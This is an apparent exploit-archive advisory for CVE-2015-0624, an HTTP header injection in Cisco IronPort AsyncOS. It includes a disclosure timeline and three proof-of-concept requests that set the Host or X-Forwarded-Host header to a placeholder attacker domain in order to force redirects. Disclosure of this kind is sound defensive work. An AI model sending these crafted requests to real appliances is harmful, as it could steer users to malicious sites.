Cisco Ironport AsyncOS HTTP Header Injection

2015.02.25

Credit: Glafkos Charalambous

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2015-0624

CWE: CWE-20

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Cisco Ironport AsyncOS HTTP Header Injection
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.0.1-023
Cisco Ironport WSA - AsyncOS 8.5.5-021
Cisco Ironport SMA - AsyncOS 8.4.0-138
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-0624
Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
20-02-2015: Vendor Advisory Release
24-02-2015: Public Disclosure
Description:
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation
of user supplied input when handling HTTP Host and X-Forwarded-Host request headers.
An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a
malicious website.
PoC #1
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: ironport:8443:@[attacker.com]
PoC #2
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: [attacker.com]
PoC #3
GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Host: ironport:8443
X-Forwarded-Host: [attacker.com]
References:
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (MingW32)
mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u
xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x
Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj
KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe
JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB
AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF
AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ
M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z
S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE
n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d
V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL
2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI=
=yiro
-----END PGP SIGNATURE-----

References:

http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cisco Ironport AsyncOS HTTP Header Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.